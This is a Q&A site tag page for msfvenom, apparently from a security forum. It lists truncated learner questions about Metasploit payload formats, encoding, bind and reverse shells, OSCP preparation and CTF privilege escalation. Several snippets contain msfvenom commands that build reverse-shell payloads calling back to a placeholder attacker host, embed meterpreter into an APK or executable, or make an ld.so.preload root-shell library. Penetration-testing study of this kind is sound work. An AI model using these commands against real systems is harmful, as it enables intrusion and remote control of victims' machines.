Questions tagged [msfvenom]

34 questions
8
votes
1 answer

Difference between "windows/shell_reverse_tcp" and "windows/shell/reverse_tcp" Exit Behavior

The above 2 Metasploit payloads are used to create a reverse shell from one system to another. The difference between them is clearly explained here https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work However, I am trying to…
Ahmed Taher
  • 701
  • 6
  • 13
  • 23
6
votes
1 answer

Encode an executable file multiple time using MSF venom

I am trying multiple encode on same the executable file, but confused with the syntax. The Problem: To encode any executable file we can use the syntax: msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=XXXX -x…
neferpitou
  • 281
  • 1
  • 3
  • 8
4
votes
1 answer

Reverse shell breaking instantly after connection has been established

currently I'm preparing for OSCP and right know I'm working on reverse shells. Using msfconsole it's not problem to get a meterpreter-session, however meterpreter is not allowed during the exam so I want to go the "manual" way. With msfvenom I…
Alex
  • 273
  • 1
  • 2
  • 7
4
votes
1 answer

Custom EXE Template Metasploit 64-bit ASM PE Syntax

I asked this previously then deleted since I think I asked the question without gearing it towards msfvenom and custom EXE templates. There is a 64-bit Windows PE written in assembly that ships with Metasploit that I am trying to compile to an EXE…
3
votes
1 answer

msfvenom incompatible character encodings error

I try to create payload for adding user to local administrators group, but the server language is Russian so I should add my local user to Администраторы group. When I try to create payload using msfvenom command, I got an error about: Error:…
user150530
  • 31
  • 3
2
votes
1 answer

Metasploit MsfVenom - Payload binds shell, but unable to spawn it with netcat

Running a SEH BoF exploit script that contains a payload that is generated from msfvenom as such: msfvenom --payload windows/shell/bind_tcp --format py --arch x86 --platform windows --bad-chars "\x00\x20" EXITFUNC=seh After running the script…
1
vote
1 answer

What is the different between "psh-reflection" and psh (msfvenom format)?

In "Framework Executable Formats" in msfvenom i see some options (psh,psh-cmd,psh-net,psh-reflection) in this article https://docs.rapid7.com/metasploit/the-payload-generator/ I see some explanation on the differences between psh and psh-cmd but…
user
  • 11
  • 1
1
vote
0 answers

msfvenom: how to output assembly of windows payload for inline assembly in C?

My goal is to obfuscate metasploit windows payloads' assembly code (adding junk code to the payload itself), then adding the obfuscated shellcode to inline assembly in C. The issue is there is no format command line argument (-f) that provides an…
pokkery98
  • 11
  • 1
1
vote
1 answer

Meterpreter Session died [Bwapp]

I just set up a lab with bwapp and wanted to jump straight into webshell. I used Unrestricted file upload vuln --> uploaded my perfect shell created with msfvenom. My only problem is that my session doesn't seem persistent as I'm getting Meterpreter…
hx.m4v
  • 21
  • 4
1
vote
1 answer

msfvenom payload available formats

How can you tell the available output formats for a given payload in msfvenom? For example: this wont work: msfvenom -p cmd/unix/reverse_ssh LHOST=[ip] LPORT=4444 -f elf > out.elf but this will: msfvenom -p cmd/unix/reverse_ssh LHOST=[ip]…
Nitro
  • 189
  • 1
  • 8
1
vote
1 answer

Msfvenom -x flag does not work

I want to embed a payload to an apk file. I tried to use the msfvenom -x ScreenBrightness.apk -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > output.apk And this was the output: Using APK template: ScreenBrightness.apk [-] No…
DVSDSV
  • 13
  • 4
1
vote
0 answers

How to use msfvenom elf-so format together with /etc/ld.so.preload?

I'm playing some CTF challenges and I'm trying to exploit ld.so.preload to obtain a root shell. I'm currently testing on my local Kali. I generate my payload as follows: msfvenom -p linux/x64/exec CMD="/bin/bash" -o elf-so -o /root/bash.so If I…
Zagorax
  • 111
  • 1
  • 3
1
vote
1 answer

Windows 64-bit Reverse TCP Shell not working

I am sending shellcode to a 64-bit binary running on a Windows machine. This binary, copies the shellcode to an executable region of memory and executes it. I am generating the shellcode using msfvenom and I chose the payload:…
Neon Flash
  • 929
  • 2
  • 11
  • 17
1
vote
1 answer

Switching to native meterpreter

I've managed to get a meterpreter session running between my Kali Linux and Windows 2016 Server by uploading a payload as an Apache Axis2 web service. I want to change to a windows meterpreter(in order to use windows exploits). I tried creating new…
Kalle
  • 21
  • 3
1
vote
1 answer

What does windows meterpreter reverse TCP Shellcode do?

I have just started learning msfconsole and I have used windows/meterpreter/reverse_tcp . I know this establishes a connection from the target system to our attacking system . However I would like to know that when we generate the payload using…
1
2 3